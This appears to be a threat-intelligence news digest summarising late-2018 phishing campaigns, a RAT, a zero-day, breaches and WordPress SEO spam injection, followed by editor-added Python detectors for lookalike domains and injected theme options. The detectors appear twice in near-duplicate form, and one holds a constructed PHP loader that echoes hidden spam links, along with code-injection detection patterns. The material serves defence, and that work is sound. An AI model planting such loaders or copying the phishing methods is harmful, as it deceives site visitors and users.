The VBScript and JAR payloads appear to belong to the "Houdini" malware family, which installs a Remote Access Trojan (RAT) on the machine.<br/> <a href="https://forum.anomali.com/t/a-jar-full-of-problems-for-financial-services-companies/3403" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link (T1192)</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools (T1219)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts/" target="_blank"><b>Widespread Apple ID Phishing Attack Pretends to be App Store Receipts </b></a> (<i>December 18, 2018</i>)<br/> A phishing campaign masquerading as a purchase receipt from the Apple "App Store" was attempting to steal Personally Identifiable Information (PII). The email claims that the recipient has made an App Store purchase, thanks them in the email body, and provides a PDF attachment that supposedly contains additional details about the purchase. The PDF attachment contains links that claim to provide more information about the "purchase" and uses shortened URLs to hide where the links lead. If a link in the PDF document is followed, the recipient is directed to a fake Apple ID login page and, if credentials are entered, is presented with a text box claiming that the "Apple ID has been locked for security reasons. You must unlock your account before signing in." 
If the unlock button is clicked, the user is asked to fill out various data fields to supposedly unlock their account, including: address, date of birth, driver's license number, passport number, payment information, social security number, and various security questions such as mother's maiden name.<br/> <a href="https://forum.anomali.com/t/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts/3404" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.amnesty.org/en/latest/research/2018/12/when-best-practice-is-not-good-enough/" target="_blank"><b>When Best Practice Isn't Good Enough: Large Campaigns of Phishing Attacks in Middle East and North Africa Target Privacy-Conscious Users</b></a> (<i>December 19, 2018</i>)<br/> Amnesty International has observed several phishing campaigns targeting users in the Middle East and North Africa. Two recent phishing sites were discovered that pretended to be the secure email providers Tutanota and ProtonMail and attempted to deceive users into entering their email credentials. The threat actors purchased the domain "tutanota[.]org" and replicated the legitimate site, even obtaining "https://" security certificates to make it appear legitimate. If a user entered their credentials to log in, those credentials were stored by the threat actors while the site also went through a valid login procedure with the original, legitimate Tutanota site. Similarly, the email service provider "ProtonMail" was also replicated, this time with the threat actors inserting an extra "e" into the domain name so that it was "protonemail[.]ch." 
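</p>
<p>Added example by this editor, not code from the briefing or from Amnesty International: the two domains in this item use the two commonest impersonation tricks, a swapped suffix (tutanota[.]org for tutanota.com) and a one-character insertion (protonemail[.]ch for protonmail.ch), and both can be screened for in proxy or DNS logs against a short list of domains an organization cares about. The protected list and the observed domains below are assumptions constructed for the example; defanged "[.]" input is accepted so indicator lists can be fed in as published.</p>

```python
"""Flag domains that impersonate a protected brand by suffix swap or a one-edit label change.
Added example, not the briefing's or Amnesty's code; PROTECTED and OBSERVED are constructed."""

PROTECTED = ("protonmail.ch", "protonmail.com", "tutanota.com")  # assumed allow-list


def split_domain(domain):
    """Return (label, suffix) for a registrable domain. Multi-part public suffixes
    such as co.uk are deliberately not handled; use a public-suffix library in production."""
    domain = domain.lower().strip().rstrip(".").replace("[.]", ".")  # undo defanging
    label, _, suffix = domain.rpartition(".")
    return label, suffix


def edit_distance(a, b):
    """Levenshtein distance (insert, delete, substitute) with a single rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain):
    """'legitimate', 'tld-swap:<brand>', 'lookalike:<brand>' or 'unrelated'."""
    label, suffix = split_domain(domain)
    pairs = [(brand,) + split_domain(brand) for brand in PROTECTED]
    if any(label == bl and suffix == bs for _, bl, bs in pairs):
        return "legitimate"
    for brand, bl, _ in pairs:
        if label == bl:
            return "tld-swap:" + brand  # same name, different suffix (tutanota.org)
    # One insertion, deletion or substitution away; prefer the brand on the same suffix.
    near = [(bs != suffix, brand) for brand, bl, bs in pairs if edit_distance(label, bl) == 1]
    if near:
        return "lookalike:" + min(near)[1]
    return "unrelated"


def screen(domains):
    """Map each observed domain to its verdict, dropping legitimate and unrelated ones."""
    findings = {}
    for domain in domains:
        verdict = classify(domain)
        if verdict not in ("legitimate", "unrelated"):
            findings[domain] = verdict
    return findings


# Constructed observations: the two domains from the Amnesty report (defanged), a
# hyphenated variant, the real brand, and an unrelated host.
OBSERVED = ["tutanota.com", "tutanota[.]org", "protonemail[.]ch", "proton-mail.com", "mail.example.net"]

if __name__ == "__main__":
    for domain, verdict in screen(OBSERVED).items():
        print(domain, "->", verdict)
```

<p>An edit distance of one is a narrow net on purpose: widening it to two on short labels starts matching unrelated words, so in practice a second pass with homoglyph normalization (rn for m, 0 for o) is a better next step than a larger distance. The same label list is also what to feed a certificate-transparency monitor, since, as the item notes, the actors obtained valid certificates for their lookalikes.</p>
<p>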
If a user entered their credentials into this fake site, the same process would occur as with the Tutanota phishing sites.<br/> <a href="https://forum.anomali.com/t/when-best-practice-isnt-good-enough-large-campaigns-of-phishing-attacks-in-middle-east-and-north-africa-target-privacy-conscious-users/3405" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&amp;CK] Spearphishing via Service (T1194)</a></p><p><a href="https://www.infosecurity-magazine.com/news/nasa-staff-at-risk-after-server/" target="_blank"><b>NASA Staff at Risk After Server Breach </b></a> (<i>December 19, 2018</i>)<br/> The US-based space agency, NASA, announced that they may have suffered a data breach back in October 2018. They stated that one of their servers that stored employees' Social Security Numbers (SSN) and other Personally Identifiable Information (PII) might have been compromised and accessed by unauthorized persons. Employees that were on-boarded between July 2006 and October 2018 may have been affected in the breach. NASA is still investigating the compromise to determine the full extent of impacted employees and what sort of information was actually affected.<br/> <a href="https://forum.anomali.com/t/nasa-staff-at-risk-after-server-breach/3406" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.bleepingcomputer.com/news/security/microsoft-releases-out-of-band-security-update-for-internet-explorer-rce-zero-day/" target="_blank"><b>Microsoft Releases Out-of-Band Security Update for Internet Explorer RCE Zero-Day </b></a> (<i>December 19, 2018</i>)<br/> A Remote Code Execution (RCE) zero-day vulnerability, registered as "CVE-2018-8653," has been discovered in Microsoft's Internet Explorer web browser by Google's Threat Analysis Group. Researchers were able to identify this vulnerability when they observed it being exploited in targeted attacks. 
The vulnerability exists in how Internet Explorer handles objects in memory, and can be exploited "to corrupt memory in such a way that attackers could execute code under the security privileges of the logged in user," according to Microsoft's security advisory. Actors could also use this vulnerability to conduct malicious activity via custom-created websites, which means it could be incorporated into exploit kits or planted on legitimate websites that have been compromised.<br/> <a href="https://forum.anomali.com/t/microsoft-releases-out-of-band-security-update-for-internet-explorer-rce-zero-day/3407" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/" target="_blank"><b>Sofacy Creates New 'Go' Variant of Zebrocy Tool</b></a> (<i>December 18, 2018</i>)<br/> Researchers from Palo Alto discovered that the Advanced Persistent Threat (APT) group "Sofacy" (also known as APT28, FancyBear, Sednit, and STRONTIUM) is using a new version of the trojan "Zebrocy." This new version of the Zebrocy trojan is written in the Go language, likely to change the trojan's structure and evade detection. Sofacy conducted two different spear phishing campaigns to install this version of Zebrocy. The first campaign began on October 11, 2018; its spear phishing emails were themed around the repercussions of recent US sanctions on Russia and carried an LNK shortcut attachment. The LNK attachment was supposed to run a series of PowerShell scripts to then execute a payload, but the PowerShell scripts were coded incorrectly, so the first campaign was unsuccessful. A second email campaign followed from mid-October 2018 until mid-November 2018. This email contained a Word document that asked the recipient to enable content in order to view it properly. 
If it was enabled, the Go version of Zebrocy would be installed which allowed the APT group to screenshot the system, gather system-specific information using a legitimate GitHub library, and send all that information to a specified Command and Control (C2) server via an HTTP POST request.<br/> <a href="https://forum.anomali.com/t/sofacy-creates-new-go-variant-of-zebrocy-tool/3408" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947186">[MITRE ATT&amp;CK] Software Packing (T1045)</a> | <a href="https://ui.threatstream.com/ttp/947211">[MITRE ATT&amp;CK] Registry Run Keys / Start Folder (T1060)</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service (T1102)</a> | <a href="https://ui.threatstream.com/ttp/947278">[MITRE ATT&amp;CK] Remote File Copy (T1105)</a> | <a href="https://ui.threatstream.com/ttp/947079">[MITRE ATT&amp;CK] Screen Capture (T1113)</a> | <a href="https://ui.threatstream.com/ttp/947077">[MITRE ATT&amp;CK] Windows Management Instrumentation (T1047)</a> | <a href="https://ui.threatstream.com/ttp/947124">[MITRE ATT&amp;CK] Peripheral Device Discovery (T1120)</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery (T1082)</a> | <a href="https://ui.threatstream.com/ttp/947207">[MITRE ATT&amp;CK] Process Discovery (T1057)</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol (T1071)</a> | <a href="https://ui.threatstream.com/ttp/947117">[MITRE ATT&amp;CK] Automated Collection (T1119)</a> | <a href="https://ui.threatstream.com/ttp/947136">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information (T1140)</a> | <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell (T1086)</a> | <a 
href="https://ui.threatstream.com/ttp/947191">[MITRE ATT&amp;CK] Command-Line Interface (T1059)</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p><p><a href="https://www.zdnet.com/article/twitter-discloses-suspected-state-sponsored-attack/" target="_blank"><b>Twitter Disclosed Suspected State-Sponsored Attack </b></a> (<i>December 17, 2018</i>)<br/> The Twitter social media platform has confirmed that it was targeted with an attack by threat actors that resulted in unauthorized access to user data. Twitter has stated that the attack took place on November 15, 2018, when the unknown actors exploited a vulnerability. The vulnerability allowed the actors to identify user account country codes, phone numbers, and whether the account was locked. Twitter suspects a state-sponsored group is behind the attack, but provided no evidence for the claim beyond traffic from IP addresses in China and Saudi Arabia. Twitter stated that it fixed the bug on November 16, 2018. At the time of this writing, it is unknown what the purpose or motivation was behind this attack.<br/> <a href="https://forum.anomali.com/t/twitter-disclosed-suspected-state-sponsored-attack/3409" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://blog.sucuri.net/2018/12/clever-seo-spam-injection.html" target="_blank"><b>Clever SEO Spam Injection </b></a> (<i>December 17, 2018</i>)<br/> Sucuri researchers have reported their findings on malware that threat actors have been observed using to inject Search Engine Optimization (SEO) spam into WordPress websites. Researchers found 173 compromised websites by analyzing the websites' "theme's functions.php file loading content from the WordPress's wp_options table," and also discovered that the malicious code loads a "theme_css" option, which is abnormal because a WordPress theme does not normally load its CSS from a database option. 
The malicious code found on the affected sites was observed to be capable of adding concealed links for search engine indexing, as well as capturing specific requests to the affected site and redirecting the website visitors to spam content.<br/> <a href="https://forum.anomali.com/t/clever-seo-spam-injection/3410" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/947142">[MITRE ATT&amp;CK] Process Injection (T1055)</a></p></div></div>
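The Tutanota and ProtonMail phishing sites described above reused a brand's domain label under a different top-level domain ("tutanota[.]org") or changed it by a single character ("protonemail[.]ch"). The following lookalike-domain check is an added example for defenders reviewing proxy, DNS or mail logs; it is not code from Amnesty International or Anomali. The legitimate domains in the PROTECTED list (tutanota.com, protonmail.ch) are assumptions for illustration, and the observed domains are constructed samples.

```python
"""Flag observed domains that impersonate a protected brand.

Added example (not from the reports cited above). Two heuristics:
  1. same registrable label, different TLD   (tutanota.org vs tutanota.com)
  2. label within one edit of the brand label (protonemail.ch vs protonmail.ch)
"""

# Assumed legitimate domains; replace with your own organisation's list.
PROTECTED = ("tutanota.com", "protonmail.ch")


def split_domain(domain):
    """Naively split 'label.tld'. Multi-part public suffixes (e.g. co.uk)
    are not handled; use a public-suffix library for production data."""
    domain = domain.lower().rstrip(".")
    label, _, tld = domain.rpartition(".")
    return label, tld


def levenshtein(a, b):
    """Edit distance with insertion, deletion and substitution."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,              # deletion
                           cur[j - 1] + 1,           # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def classify(domain, protected=PROTECTED, max_edits=1):
    """Return (brand, reason) if domain looks like a protected brand, else None."""
    if domain.lower().rstrip(".") in protected:
        return None  # the genuine domain is never a lookalike of itself
    label, tld = split_domain(domain)
    for brand in protected:
        b_label, b_tld = split_domain(brand)
        if label == b_label and tld != b_tld:
            return (brand, "same label, different TLD")
        d = levenshtein(label, b_label)
        if 0 < d <= max_edits:
            return (brand, f"label within {d} edit(s)")
    return None


def find_lookalikes(observed, protected=PROTECTED):
    """Map each suspicious observed domain to the brand it resembles."""
    hits = {}
    for d in observed:
        result = classify(d, protected)
        if result:
            hits[d] = result
    return hits


# Constructed sample of domains seen in outbound traffic (not real log data).
OBSERVED = ["tutanota.org", "protonemail.ch", "protonmail.ch",
            "tutanota.com", "example.com"]

if __name__ == "__main__":
    for dom, (brand, why) in find_lookalikes(OBSERVED).items():
        print(f"{dom:20} looks like {brand:15} ({why})")
```

Running the block prints the two phishing domains from the report and nothing for the genuine ones. Raising max_edits to 2 catches more typosquats at the cost of false positives on short labels; the check is meant as a triage filter feeding a manual review, not a blocklist on its own.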
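The SEO spam injection above was identified by the theme's functions.php loading content from the wp_options table through an option ("theme_css") that a theme has no normal reason to load. The audit below is an added example of that triage step, written for this briefing and not taken from Sucuri's report: it lists every option name a theme file reads with get_option() and flags any that is outside an assumed baseline, with a higher-severity reason when the stored value contains markup or PHP code markers. The functions.php source and wp_options rows are constructed samples; KNOWN_OPTIONS is an assumed baseline, not a WordPress-provided list.

```python
"""Audit a WordPress theme's use of wp_options for injected loaders.

Added example (not Sucuri's or Anomali's code). Input is the text of a theme
PHP file and a dict of wp_options rows (option_name -> option_value), e.g.
exported with: SELECT option_name, option_value FROM wp_options;
"""
import re

# get_option('name') / get_option("name") calls in theme source.
OPTION_CALL = re.compile(r"""get_option\(\s*['"]([A-Za-z0-9_\-]+)['"]""")

# Markers that have no place in a value a theme would echo as CSS:
# PHP open tags, eval/base64 decoding, hidden containers and anchor tags.
SUSPICIOUS_VALUE = re.compile(
    r"(<\?php|\beval\s*\(|base64_decode\s*\(|display\s*:\s*none|<a\s)", re.I)

# Assumed baseline of options a theme legitimately reads; tune per site.
KNOWN_OPTIONS = {"blogname", "siteurl", "stylesheet", "template", "home"}


def options_loaded_by_theme(php_source):
    """Return the sorted set of option names the theme source reads."""
    return sorted(set(OPTION_CALL.findall(php_source)))


def audit(php_source, wp_options, baseline=KNOWN_OPTIONS):
    """Return [(option_name, reason)] for options worth an analyst's review."""
    findings = []
    for name in options_loaded_by_theme(php_source):
        if name in baseline:
            continue
        value = wp_options.get(name, "")
        if SUSPICIOUS_VALUE.search(value):
            findings.append((name, "theme loads option whose value contains markup/code"))
        else:
            findings.append((name, "theme loads non-standard option (review)"))
    return findings


# Constructed sample: ordinary theme code plus one injected loader line.
FUNCTIONS_PHP = """<?php
add_action('wp_enqueue_scripts', 'theme_styles');
function theme_styles() { wp_enqueue_style('main', get_stylesheet_uri()); }
$tpl = get_option('template');
$css = get_option('theme_css');
if (!empty($css)) { echo $css; }
"""

# Constructed wp_options rows; the theme_css value is a hidden spam link block.
WP_OPTIONS = {
    "template": "twentyseventeen",
    "blogname": "Example Blog",
    "theme_css": '<div style="display:none"><a href="http://spam.example/">'
                 'cheap pills</a></div>',
}

if __name__ == "__main__":
    for name, reason in audit(FUNCTIONS_PHP, WP_OPTIONS):
        print(f"{name}: {reason}")
```

On the constructed input the audit reports only theme_css, because "template" is in the baseline. In a real investigation the same check should be run over every PHP file in the theme and plugin directories, since the loader need not live in functions.php, and any flagged option value should be preserved before the site is cleaned.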